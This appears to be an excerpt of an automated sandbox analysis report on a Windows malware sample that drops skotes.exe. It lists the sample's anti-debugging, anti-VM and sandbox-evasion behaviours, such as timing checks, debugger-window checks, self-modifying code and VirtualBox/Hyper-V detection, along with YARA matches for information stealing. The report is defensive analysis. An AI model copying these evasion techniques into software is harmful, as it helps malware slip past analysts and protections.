Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54506F9 second address: 545070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 545070B second address: 545070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: C4EBCC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: C4EC6B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: E098B4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: E37BA9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: E1084E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: E9AC13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FCEBCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FCEC6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11898B4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11B7BA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 119084E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 121AC13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\msqT9atzYW.exe Code function: 0_2_05450654 rdtsc 0_2_05450654
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1081
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 511
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1316
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1201
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2836 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2836 Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6512 Thread sleep count: 1081 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6512 Thread sleep time: -2163081s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788 Thread sleep count: 511 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788 Thread sleep time: -15330000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2848 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4856 Thread sleep count: 1316 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4856 Thread sleep time: -2633316s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5396 Thread sleep count: 1201 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5396 Thread sleep time: -2403201s >= -30000s
Source: C:\Users\user\Desktop\msqT9atzYW.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: skotes.exe, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW[
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: msqT9atzYW.exe, 00000000.00000002.2266464940.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2299739662.0000000001167000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2311366015.0000000001167000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\msqT9atzYW.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\msqT9atzYW.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\msqT9atzYW.exe Code function: 0_2_05450654 rdtsc 0_2_05450654
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F9652B mov eax, dword ptr fs:[00000030h] 7_2_00F9652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F9A302 mov eax, dword ptr fs:[00000030h] 7_2_00F9A302
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: skotes.exe, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: EProgram Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F7D3E2 cpuid 7_2_00F7D3E2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F7CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_00F7CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F665E0 LookupAccountNameA, 7_2_00F665E0

Stealing of Sensitive Information

Source: Yara match File source: 7.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.msqT9atzYW.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.2271001764.0000000005790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2311270072.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2764127770.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2266387478.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2299648103.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2226138822.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2258806341.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY